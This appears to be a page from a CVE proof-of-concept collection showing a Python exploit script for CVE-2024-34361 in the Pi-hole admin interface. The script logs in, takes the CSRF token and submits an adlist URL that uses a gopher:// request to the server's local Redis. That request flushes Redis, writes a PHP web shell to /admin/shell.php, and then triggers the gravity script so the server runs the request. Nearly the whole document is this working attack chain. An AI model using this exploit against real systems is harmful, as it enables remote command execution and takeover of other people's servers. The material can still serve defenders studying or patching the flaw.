4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-34361
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import sys
import requests
from bs4 import BeautifulSoup
import urllib3

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def log_in(base_url, password):
    url_login = f"{base_url}/admin/login.php"
    login_data = {
        'pw': password
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
    }

    with requests.Session() as session:
        session.verify = False
        response = session.post(url_login, data=login_data, headers=headers)

        if "Wrong password" in response.text:
            print("Login failed. Incorrect password.")
            return None
        else:
            print("Log In Success")
            return session

def extract_csrf_token(html):
    soup = BeautifulSoup(html, 'html.parser')
    token = soup.find(id="token")
    
    if token:
        print(f"CSRF Token Obtained: {token.text.strip()}")
        return token.text.strip()
    else:
        print("CSRF token not found on the page.")
        return None

def access_adlists(session, base_url):
    url_adlists = f"{base_url}/admin/groups-adlists.php"
    response = session.get(url_adlists)

    if response.status_code == 200:
        return extract_csrf_token(response.text)
    else:
        print("Error accessing 'groups-adlists'. Status code:", response.status_code)
        return None

def add_payload(session, base_url, csrf_token):
    url = f"{base_url}/admin/scripts/pi-hole/php/groups.php"

    data = {
        'action': 'add_adlist',
        'address': 'gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2419%0D%0A/var/www/html/admin%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A',
        'comment': '',
        'token': csrf_token
    }

    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    }

    session.post(url, data=data, headers=headers)

    print("Sending payload")
    print("shell.php dropped in /admin/shell.php")

  

def execute_payload(session, base_url):
    url = f"{base_url}/admin/scripts/pi-hole/php/gravity.sh.php"

    headers = {
        'Accept': 'text/event-stream',
        'Cache-Control': 'no-cache',
        'Sec-Fetch-Site': 'same-origin',
        'Sec-Fetch-Mode': 'cors',
        'Sec-Fetch-Dest': 'empty',
        'Referer': f"{base_url}/admin/gravity.php",
    }

    session.get(url, headers=headers)

                

def main():
    if len(sys.argv) != 3:
        print("Usage: script.py <Base URL> <password>")
        sys.exit(1)

    base_url = sys.argv[1]
    password = sys.argv[2]

    session = log_in(base_url, password)
    if session:
        csrf_token = access_adlists(session, base_url)
        if csrf_token:
            add_payload(session, base_url, csrf_token)
            execute_payload(session, base_url)

if __name__ == "__main__":
    main()